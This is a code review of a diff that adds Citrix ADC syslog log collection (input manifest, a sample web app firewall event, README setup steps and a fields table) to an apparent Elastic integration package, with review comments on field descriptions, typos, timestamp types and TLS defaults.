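Review bot: None of the `citrix_adc.log.*` fields in this new file carry a `description`, while the `citrix.*` group at the top of the same file documents every field; names such as `client_cookie`, `client_security_expression`, `peid` or `spcb_id` are not self-explanatory, and a one-line `description:` per field (e.g. `description: Raw cookie header sent by the client.`) is what the generated README surfaces. The names `compression_ratio_recieved`, `total_bytes_wire_recieved` and `total_compressed_bytes_recieved` are misspelled, and since the file is new, renaming them to `received` now avoids freezing the typo into the mapping (the pipeline that sets them is outside this chunk and would need the same rename). Timestamp-like fields are also typed inconsistently: `start_time`, `end_time` and `delink_time` are `date`, but `app.launch_time`, `app.termination_time`, `session_end_time` and `session_setup_time` are `keyword`, which rules out range queries on the latter. Finally, `client_cookie` is a plain keyword, so if the pipeline stores the full Cookie header there, session identifiers are indexed verbatim; confirm that is intended or truncate/hash the value in the pipeline.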
@@ -0,0 +1,238 @@ +title: Citrix ADC logs +type: logs +streams: + - input: udp + title: Citrix ADC logs + enabled: false + description: Collect Citrix ADC logs (via Syslog). + template_path: udp.yml.hbs + vars: + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - citrix_adc.log + - forwarded + - name: listen_address + type: text + title: Listen Address + description: The bind address to listen for UDP connections. Set to `0.0.0.0` to bind to all available interfaces. + multi: false + required: true + show_user: true + default: localhost + - name: listen_port + type: integer + title: Listen Port + description: The UDP port number to listen on. + multi: false + required: true + show_user: true + default: 9521 + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve citrix_adc.log fields that were copied to Elastic Common Schema (ECS) fields. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: |- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. + This executes in the agent before the logs are parsed. + See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: udp_options + type: yaml + title: Custom UDP Options + multi: false + required: false + show_user: false + default: | + #max_message_size: 50KiB + #timeout: 300s + description: Specify custom configuration options for the UDP input. 
+ - name: tz_offset + type: text + title: Timezone + multi: false + required: false + show_user: false + default: UTC + description: IANA time zone or time offset (e.g. `+0200`) to use when interpreting syslog timestamps without a time zone. + - input: tcp + title: Citrix ADC logs + enabled: false + description: Collect Citrix ADC logs (via Syslog). + template_path: tcp.yml.hbs + vars: + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - citrix_adc.log + - forwarded + - name: listen_address + type: text + title: Listen Address + description: The bind address to listen for TCP connections. Set to `0.0.0.0` to bind to all available interfaces. + multi: false + required: true + show_user: true + default: localhost + - name: listen_port + type: integer + title: Listen Port + description: The TCP port number to listen on. + multi: false + required: true + show_user: true + default: 9522 + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve citrix_adc.log fields that were copied to Elastic Common Schema (ECS) fields. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: |- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. + This executes in the agent before the logs are parsed. + See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. 
certificate_authorities, supported_protocols, verification_mode etc. + multi: false + required: false + show_user: false + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- + - name: tcp_options + type: yaml + title: Custom TCP Options + multi: false + required: false + show_user: false + default: | + #max_message_size: 50KiB + #max_connections: 1 + description: Specify custom configuration options for the TCP input. + - name: tz_offset + type: text + title: Timezone + multi: false + required: false + show_user: false + default: UTC + description: IANA time zone or time offset (e.g. `+0200`) to use when interpreting syslog timestamps without a time zone. + - input: logfile + enabled: false + title: Citrix ADC logs + description: Collect Citrix ADC logs. 
+ vars: + - name: paths + type: text + title: Paths + multi: true + required: true + show_user: true + default: + - /var/log/citrix-adc.log + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - citrix_adc.log + - forwarded + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: |- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. + This executes in the agent before the logs are parsed. + See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve citrix_adc.log fields that were copied to Elastic Common Schema (ECS) fields. + type: bool + multi: false + default: false + - name: tz_offset + type: text + title: Timezone + multi: false + required: false + show_user: false + default: UTC + description: IANA time zone or time offset (e.g. `+0200`) to use when interpreting syslog timestamps without a time zone. diff --git a/packages/citrix_adc/data_stream/log/sample_event.json b/packages/citrix_adc/data_stream/log/sample_event.json new file mode 100644 index 00000000000..ab565459a8e --- /dev/null +++ b/packages/citrix_adc/data_stream/log/sample_event.json 
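Review bot: The `ssl` option on the TCP input shows only `certificate_authorities` in its default example, but a TLS-terminating syslog listener also needs the server's own `certificate` and `key`; if the template hands this block straight to the tcp input's `ssl` setting, as the description suggests, a user who fills in only a CA will not get a working TLS endpoint (whether it fails the handshake or falls back to plaintext depends on the input, which is outside this chunk). Extending the commented default with `#certificate: /path/to/server.crt` and `#key: /path/to/server.key`, and stating in the description that `certificate_authorities` is for verifying client certificates (also "i.e." should be "e.g."), makes the intent clear. The UDP input has no equivalent option, so its description could note that UDP syslog is unauthenticated and unencrypted and that the TCP input with `ssl` is preferred where the ADC supports it.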
@@ -0,0 +1,113 @@ +{ + "@timestamp": "2012-12-18T21:46:17.000Z", + "agent": { + "ephemeral_id": "2976e761-4399-4de7-8ea0-97ea83ec7726", + "id": "418f7c57-c332-4913-b3ec-ddaa31f832a0", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.0" + }, + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=54711 method=GET request=http://vpx247.example.net/FFC/login_post.html?abc\\=def msg=Disallow Illegal URL. cn1=465 cn2=535 cs1=profile1 cs2=PPE0 cs3=IliG4Dxp1SjOhKVRDVBXmqvAaIcA000 cs4=ALERT cs5=2012 act=not blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS10.0", + "facility": "local0", + "name": "APPFW_STARTURL", + "ppe_id": "PPE0", + "priority": "info", + "profile_name": "profile1", + "session_id": "IliG4Dxp1SjOhKVRDVBXmqvAaIcA000", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "data_stream": { + "dataset": "citrix_adc.log", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.12.0" + }, + "elastic_agent": { + "id": "418f7c57-c332-4913-b3ec-ddaa31f832a0", + "snapshot": false, + "version": "8.12.0" + }, + "event": { + "action": "not blocked", + "agent_id_status": "verified", + "dataset": "citrix_adc.log", + "id": "465", + "ingested": "2024-03-20T08:51:14Z", + "original": "Dec 18 21:46:17 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=54711 method=GET request=http://vpx247.example.net/FFC/login_post.html?abc\\=def msg=Disallow Illegal URL. 
cn1=465 cn2=535 cs1=profile1 cs2=PPE0 cs3=IliG4Dxp1SjOhKVRDVBXmqvAaIcA000 cs4=ALERT cs5=2012 act=not blocked", + "severity": 6, + "timezone": "+00:00" + }, + "http": { + "request": { + "id": "535", + "method": "GET" + } + }, + "input": { + "type": "udp" + }, + "log": { + "source": { + "address": "192.168.249.4:48549" + } + }, + "message": "Disallow Illegal URL.", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 54711 + }, + "tags": [ + "preserve_original_event", + "citrix_adc.log", + "forwarded" + ], + "url": { + "domain": "vpx247.example.net", + "extension": "html", + "original": "http://vpx247.example.net/FFC/login_post.html?abc\\=def", + "path": "/FFC/login_post.html", + "query": "abc\\=def", + "scheme": "http" + } +} \ No newline at end of file diff --git a/packages/citrix_adc/docs/README.md b/packages/citrix_adc/docs/README.md index 9b78a3cac81..e1f420531ba 100644 --- a/packages/citrix_adc/docs/README.md +++ b/packages/citrix_adc/docs/README.md 
@@ -4,9 +4,11 @@ The Citrix ADC integration allows you to monitor your Citrix ADC instance. Citrix ADC is an application delivery controller that performs application-specific traffic analysis to intelligently distribute, optimize, and secure Layer 4 - Layer 7 (L4–L7) network traffic for web applications. +The Citrix Web App Firewall prevents security breaches, data loss, and possible unauthorized modifications to websites that access sensitive business or customer information. It does so by filtering both requests and responses, examining them for evidence of malicious activity, and blocking requests that exhibit such activity. Your site is protected not only from common types of attacks, but also from new, as yet unknown attacks. In addition to protecting web servers and websites from unauthorized access, the Web App Firewall protects against vulnerabilities in legacy CGI code or scripts, web frameworks, web server software, and other underlying operating systems. + Use the Citrix ADC integration to: -Collect metrics related to the interface, lbvserver, service, system and vpn. +Collect metrics related to the interface, lbvserver, service, system, vpn and logs. Create visualizations to monitor, measure and analyze the usage trend and key data, and derive business insights. Create alerts to reduce the MTTD and also the MTTR by referencing relevant logs when troubleshooting an issue. 
@@ -18,12 +20,37 @@ The Citrix ADC integration collects metrics data. Metrics give you insight into the statistics of the Citrix ADC. Metrics data streams collected by the Citrix ADC integration include [interface](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/network/interface/), [lbvserver](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/lb/lbvserver/), [service](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/basic/service/), [system](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/system/system/) and [vpn](https://developer-docs.citrix.com/projects/netscaler-nitro-api/en/12.0/statistics/vpn/vpn/), so that the user could monitor and troubleshoot the performance of the Citrix ADC instances. +**Log** is used to retrieve Citrix Netscaler logs. See more details in the documentation [here](https://developer-docs.netscaler.com/en-us/netscaler-syslog-message-reference/current-release). + Note: -- Users can monitor and see the metrics inside the ingested documents for Citrix ADC in the logs-* index pattern from `Discover`. +- Users can monitor and see the metrics and logs inside the ingested documents for Citrix ADC in the logs-* index pattern from `Discover`. +## Requirements + +Elastic Agent must be installed. For more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +### Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, and manage your agents in a central location. We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. 
+ +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, you install Elastic Agent and manually configure the agent locally on the system where it’s installed. You are responsible for managing and upgrading the agents. This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **Kibana version** required is **8.12.0**. ## Compatibility -This integration has been tested against Citrix ADC `v13.0` and `v13.1`. +This integration has been tested against Citrix ADC `v13.0`, `v13.1` and `v14.1`. ## Prerequisites 
@@ -39,10 +66,41 @@ Example Host Configuration: `http://localhost:9080` For step-by-step instructions on how to set up an integration, see the [Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. +### Steps for configuring CEF format: + +1. Navigate to **Security** the NetScaler GUI. +2. Click **Application Firewall** node. +3. Select Change Engine Settings. +4. Enable CEF Logging. + +**Note**: It is recommended to configure the application firewall to enable CEF-formatted logs. + +### Steps for configuring Syslog format: + +The Citrix WAF GUI can be used to configure syslog servers and WAF message types to be sent to the syslog servers. Refer to [How to Send Application Firewall Messages to a Separate Syslog Server](https://support.citrix.com/article/CTX138973) and [How to Send NetScaler Application Firewall Logs to Syslog Server and NS.log](https://support.citrix.com/article/CTX211543) for details. + ## Validation After the integration is successfully configured, clicking on the Assets tab of the Citrix ADC Integration should display a list of available dashboards. Click on the dashboard available for your configured datastream. It should be populated with the required data. +### Enabling the integration in Elastic: + +1. In Kibana go to Management > Integrations +2. In "Search for integrations" search bar, type Citrix ADC +3. Click on the "Citrix ADC" integration from the search results. +4. Click on the "Add Citrix ADC" button to add the integration. +5. 
While adding the integration, if you want to collect logs via logfile, keep **Collect logs from Citrix ADC via file** toggle on and then configure following parameters: + - Paths + + or if you want to collect logs via TCP, keep **Collect logs from Citrix ADC via TCP** toggle on and then configure following parameters: + - Listen Address + - Listen Port + + or if you want to collect logs via UDP, keep **Collect logs from Citrix ADC via UDP** toggle on and and then configure following parameters: + - Listen Address + - Listen Port +6. Save the integration. + ### Troubleshooting #### Dummy values 
@@ -1056,3 +1114,529 @@ An example event for `vpn` looks as following: | host.ip | Host ip addresses. | ip | | | input.type | Type of Filebeat input. | keyword | | | tags | List of keywords used to tag each event. | keyword | | + + +### Logs + +The `citrix_adc.log` dataset provides events from the configured syslog server. + +An example event for `log` looks as following: + +```json +{ + "@timestamp": "2012-12-18T21:46:17.000Z", + "agent": { + "ephemeral_id": "2976e761-4399-4de7-8ea0-97ea83ec7726", + "id": "418f7c57-c332-4913-b3ec-ddaa31f832a0", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.0" + }, + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=54711 method=GET request=http://vpx247.example.net/FFC/login_post.html?abc\\=def msg=Disallow Illegal URL. cn1=465 cn2=535 cs1=profile1 cs2=PPE0 cs3=IliG4Dxp1SjOhKVRDVBXmqvAaIcA000 cs4=ALERT cs5=2012 act=not blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS10.0", + "facility": "local0", + "name": "APPFW_STARTURL", + "ppe_id": "PPE0", + "priority": "info", + "profile_name": "profile1", + "session_id": "IliG4Dxp1SjOhKVRDVBXmqvAaIcA000", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "data_stream": { + "dataset": "citrix_adc.log", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.12.0" + }, + "elastic_agent": { + "id": "418f7c57-c332-4913-b3ec-ddaa31f832a0", + "snapshot": false, + "version": "8.12.0" + }, + "event": { + "action": "not blocked", + "agent_id_status": "verified", + "dataset": "citrix_adc.log", + "id": "465", + "ingested": 
"2024-03-20T08:51:14Z", + "original": "Dec 18 21:46:17 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=54711 method=GET request=http://vpx247.example.net/FFC/login_post.html?abc\\=def msg=Disallow Illegal URL. cn1=465 cn2=535 cs1=profile1 cs2=PPE0 cs3=IliG4Dxp1SjOhKVRDVBXmqvAaIcA000 cs4=ALERT cs5=2012 act=not blocked", + "severity": 6, + "timezone": "+00:00" + }, + "http": { + "request": { + "id": "535", + "method": "GET" + } + }, + "input": { + "type": "udp" + }, + "log": { + "source": { + "address": "192.168.249.4:48549" + } + }, + "message": "Disallow Illegal URL.", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 54711 + }, + "tags": [ + "preserve_original_event", + "citrix_adc.log", + "forwarded" + ], + "url": { + "domain": "vpx247.example.net", + "extension": "html", + "original": "http://vpx247.example.net/FFC/login_post.html?abc\\=def", + "path": "/FFC/login_post.html", + "query": "abc\\=def", + "scheme": "http" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Date/time when the event originated. This is the date/time extracted from the event, typically representing when the event was generated by the source. If the event source has no original timestamp, this value is typically populated by the first time the event was received by the pipeline. Required field for all events. | date | +| citrix.cef_format | Whether the logging is in Citrix CEF format. | boolean | +| citrix.cef_version | The CEF format version used in the logs. | keyword | +| citrix.default_class | Whether the event class was the default. 
| boolean | +| citrix.detail | The CEF or Citrix Native format details for the event. | keyword | +| citrix.device_event_class_id | The ID of the event class. | keyword | +| citrix.device_product | The model of the appliance. | keyword | +| citrix.device_vendor | The name of the vendor for the device. | keyword | +| citrix.device_version | The version of the device. | keyword | +| citrix.extended | Additional data associated with the event. | flattened | +| citrix.facility | The logging facility. | keyword | +| citrix.host | The name of the host receiving the logs. | keyword | +| citrix.hostname | The name of the host receiving the logs. | keyword | +| citrix.name | The name of the security check. | keyword | +| citrix.ppe_id | Packet Processing Engine ID. | keyword | +| citrix.priority | The logging priority. | keyword | +| citrix.profile_name | The name of the profile that raised the event. | keyword | +| citrix.session_id | The ID for the session. | keyword | +| citrix.severity | The severity of the event. | keyword | +| citrix.signature_violation_category | The category that the violation is grouped into. 
| keyword | +| citrix_adc.log.access | | keyword | +| citrix_adc.log.access_type | | keyword | +| citrix_adc.log.action | | keyword | +| citrix_adc.log.adm_user | | keyword | +| citrix_adc.log.app.launch_time | | keyword | +| citrix_adc.log.app.name | | keyword | +| citrix_adc.log.app.process_id | | long | +| citrix_adc.log.app.termination_time | | keyword | +| citrix_adc.log.app.termination_type | | keyword | +| citrix_adc.log.appfw_rfc_profile | | keyword | +| citrix_adc.log.application_name | | keyword | +| citrix_adc.log.auto_deploy_mins | | long | +| citrix_adc.log.browser | | keyword | +| citrix_adc.log.browser_type | | keyword | +| citrix_adc.log.bytes.received | | long | +| citrix_adc.log.bytes.sent | | long | +| citrix_adc.log.call_id | | keyword | +| citrix_adc.log.callee.domain_name | | keyword | +| citrix_adc.log.callee.user_name | | keyword | +| citrix_adc.log.caller.domain_name | | keyword | +| citrix_adc.log.caller.user_name | | keyword | +| citrix_adc.log.category | | keyword | +| citrix_adc.log.category_group | | keyword | +| citrix_adc.log.certificate_key_pair | | keyword | +| citrix_adc.log.channel_id_1 | | long | +| citrix_adc.log.channel_id_1_val | | long | +| citrix_adc.log.channel_id_2 | | long | +| citrix_adc.log.channel_id_2_val | | long | +| citrix_adc.log.channel_id_3 | | long | +| citrix_adc.log.channel_id_3_val | | long | +| citrix_adc.log.channel_id_4 | | long | +| citrix_adc.log.channel_id_4_val | | long | +| citrix_adc.log.channel_id_5 | | long | +| citrix_adc.log.channel_id_5_val | | long | +| citrix_adc.log.channel_update.begin | | keyword | +| citrix_adc.log.channel_update.end | | keyword | +| citrix_adc.log.cipher_suite | | keyword | +| citrix_adc.log.client_cookie | | keyword | +| citrix_adc.log.client_hostname | | keyword | +| citrix_adc.log.client_ip | | ip | +| citrix_adc.log.client_launcher | | keyword | +| citrix_adc.log.client_port | | long | +| citrix_adc.log.client_security_check_status | | keyword | +| 
citrix_adc.log.client_security_expression | | keyword | +| citrix_adc.log.client_type | | keyword | +| citrix_adc.log.client_version | | keyword | +| citrix_adc.log.clientside.jitter | | long | +| citrix_adc.log.clientside.packet_retransmits | | long | +| citrix_adc.log.clientside.rtt | | keyword | +| citrix_adc.log.clientside.rxbytes | | long | +| citrix_adc.log.clientside.txbytes | | long | +| citrix_adc.log.closure_reason | | keyword | +| citrix_adc.log.code | | keyword | +| citrix_adc.log.command | | keyword | +| citrix_adc.log.compression_ratio_recieved | | double | +| citrix_adc.log.compression_ratio_send | | double | +| citrix_adc.log.connection_id | | keyword | +| citrix_adc.log.connection_priority | | keyword | +| citrix_adc.log.content_length_bytes | | long | +| citrix_adc.log.content_type | | keyword | +| citrix_adc.log.content_type_mismatch | | keyword | +| citrix_adc.log.cookie_header_length | | long | +| citrix_adc.log.crl_name | | keyword | +| citrix_adc.log.customer_name | | keyword | +| citrix_adc.log.data | | keyword | +| citrix_adc.log.data_length | | long | +| citrix_adc.log.days_to_expire | | long | +| citrix_adc.log.deleted_rules | | long | +| citrix_adc.log.delink_time | | date | +| citrix_adc.log.delink_timezone | | keyword | +| citrix_adc.log.destination.ip | | ip | +| citrix_adc.log.destination.port | | long | +| citrix_adc.log.device_serial_number | | keyword | +| citrix_adc.log.domain | | keyword | +| citrix_adc.log.domain_name | | keyword | +| citrix_adc.log.duration | | keyword | +| citrix_adc.log.end_time | | date | +| citrix_adc.log.end_time_timezone | | keyword | +| citrix_adc.log.errmsg | | keyword | +| citrix_adc.log.error | | keyword | +| citrix_adc.log.error_code | | keyword | +| citrix_adc.log.error_line | | keyword | +| citrix_adc.log.failure_reason | | keyword | +| citrix_adc.log.field_name | | keyword | +| citrix_adc.log.field_type | | keyword | +| citrix_adc.log.flags | | keyword | +| citrix_adc.log.group | | keyword | +| 
citrix_adc.log.groups | | keyword | +| citrix_adc.log.handshake_time | | keyword | +| citrix_adc.log.header | | keyword | +| citrix_adc.log.header_length | | long | +| citrix_adc.log.hit.count | | long | +| citrix_adc.log.hit.rule | | keyword | +| citrix_adc.log.hostname | | keyword | +| citrix_adc.log.html_url | | keyword | +| citrix_adc.log.http_resources_accessed | | keyword | +| citrix_adc.log.ica_rtt | | keyword | +| citrix_adc.log.icap_server.ip | | ip | +| citrix_adc.log.icap_server.port | | long | +| citrix_adc.log.id | | keyword | +| citrix_adc.log.infomsg | | keyword | +| citrix_adc.log.ip_address | | ip | +| citrix_adc.log.issuer_name | | keyword | +| citrix_adc.log.l7_latency.max_notify_count | | long | +| citrix_adc.log.l7_latency.notify_interval | | long | +| citrix_adc.log.l7_latency.threshold_factor | | long | +| citrix_adc.log.l7_latency.waittime | | keyword | +| citrix_adc.log.l7_threshold_breach.avg_clientside_latency | | long | +| citrix_adc.log.l7_threshold_breach.avg_serverside_latency | | long | +| citrix_adc.log.l7_threshold_breach.max_clientside_latency | | long | +| citrix_adc.log.l7_threshold_breach.max_serverside_latency | | long | +| citrix_adc.log.last_contact | | keyword | +| citrix_adc.log.launch_mechanism | | keyword | +| citrix_adc.log.ldap_scope | | keyword | +| citrix_adc.log.license_limit | | long | +| citrix_adc.log.logout_method | | keyword | +| citrix_adc.log.matched_url | | keyword | +| citrix_adc.log.max_allowed.cookie_header_length | | long | +| citrix_adc.log.max_allowed.header_length | | long | +| citrix_adc.log.max_allowed.query_string_length | | long | +| citrix_adc.log.max_allowed.total_http_header_length | | long | +| citrix_adc.log.max_allowed.url_length | | long | +| citrix_adc.log.max_restarts | | long | +| citrix_adc.log.message | | keyword | +| citrix_adc.log.method | | keyword | +| citrix_adc.log.min_l7_latency | | long | +| citrix_adc.log.mode | | keyword | +| citrix_adc.log.module_path | | keyword | +| 
citrix_adc.log.nat.ip | | ip | +| citrix_adc.log.nat.port | | long | +| citrix_adc.log.natted.ip | | ip | +| citrix_adc.log.natted.port | | long | +| citrix_adc.log.newly_added_rules | | long | +| citrix_adc.log.non_http_services_accessed | | keyword | +| citrix_adc.log.nsica_session.acr_count | | long | +| citrix_adc.log.nsica_session.client.ip | | ip | +| citrix_adc.log.nsica_session.client.port | | long | +| citrix_adc.log.nsica_session.reconnect_count | | long | +| citrix_adc.log.nsica_session.server.ip | | ip | +| citrix_adc.log.nsica_session.server.port | | long | +| citrix_adc.log.nsica_session.status | | keyword | +| citrix_adc.log.nsica_status | | keyword | +| citrix_adc.log.old_pid | | long | +| citrix_adc.log.origin_server.ip | | ip | +| citrix_adc.log.origin_server.port | | long | +| citrix_adc.log.original_destination.ip | | ip | +| citrix_adc.log.original_destination.port | | long | +| citrix_adc.log.pcre_error_code | | keyword | +| citrix_adc.log.peid | | keyword | +| citrix_adc.log.policy_action | | keyword | +| citrix_adc.log.policy_violation | | keyword | +| citrix_adc.log.process.id | | long | +| citrix_adc.log.process.name | | keyword | +| citrix_adc.log.profile | | keyword | +| citrix_adc.log.protocol | | keyword | +| citrix_adc.log.protocol_version | | keyword | +| citrix_adc.log.query_string_length | | long | +| citrix_adc.log.reason | | keyword | +| citrix_adc.log.referer_header | | keyword | +| citrix_adc.log.register | | keyword | +| citrix_adc.log.remote_ip | | ip | +| citrix_adc.log.reputation | | long | +| citrix_adc.log.request.bytes_sent | | long | +| citrix_adc.log.request.path | | keyword | +| citrix_adc.log.response.bytes_sent | | long | +| citrix_adc.log.response.code | | long | +| citrix_adc.log.rewritten_url | | keyword | +| citrix_adc.log.rule | | keyword | +| citrix_adc.log.rule_id | | keyword | +| citrix_adc.log.sequence_number | | long | +| citrix_adc.log.serial_number | | keyword | +| citrix_adc.log.server.ip | | ip | +| 
citrix_adc.log.server.name | | keyword | +| citrix_adc.log.server.port | | long | +| citrix_adc.log.server_authentication | | keyword | +| citrix_adc.log.serverside.jitter | | long | +| citrix_adc.log.serverside.packet_retransmits | | long | +| citrix_adc.log.serverside.rtt | | keyword | +| citrix_adc.log.service | | keyword | +| citrix_adc.log.session | | keyword | +| citrix_adc.log.session_end_time | | keyword | +| citrix_adc.log.session_guid | | keyword | +| citrix_adc.log.session_id | | keyword | +| citrix_adc.log.session_setup_time | | keyword | +| citrix_adc.log.signature_algorithm | | keyword | +| citrix_adc.log.signature_id | | keyword | +| citrix_adc.log.source.ip | | ip | +| citrix_adc.log.source.port | | long | +| citrix_adc.log.spcb_id | | keyword | +| citrix_adc.log.ssl_relay.address | | ip | +| citrix_adc.log.ssl_relay.port | | long | +| citrix_adc.log.sslvpn_client_type | | keyword | +| citrix_adc.log.sso_status | | keyword | +| citrix_adc.log.start_time | | date | +| citrix_adc.log.start_time_timezone | | keyword | +| citrix_adc.log.startup_duration | | long | +| citrix_adc.log.status | | keyword | +| citrix_adc.log.subject_name | | keyword | +| citrix_adc.log.timestamp | | date | +| citrix_adc.log.timezone | | keyword | +| citrix_adc.log.total_bytes_received | | long | +| citrix_adc.log.total_bytes_send | | long | +| citrix_adc.log.total_bytes_wire_recieved | | keyword | +| citrix_adc.log.total_bytes_wire_send | | keyword | +| citrix_adc.log.total_compressed_bytes_recieved | | long | +| citrix_adc.log.total_compressed_bytes_send | | long | +| citrix_adc.log.total_http_header_length | | long | +| citrix_adc.log.total_policies_allowed | | long | +| citrix_adc.log.total_policies_denied | | long | +| citrix_adc.log.total_tcp_connections | | long | +| citrix_adc.log.total_udp_flows | | long | +| citrix_adc.log.translated_destination.ip | | ip | +| citrix_adc.log.translated_destination.port | | long | +| citrix_adc.log.transport | | keyword | +| 
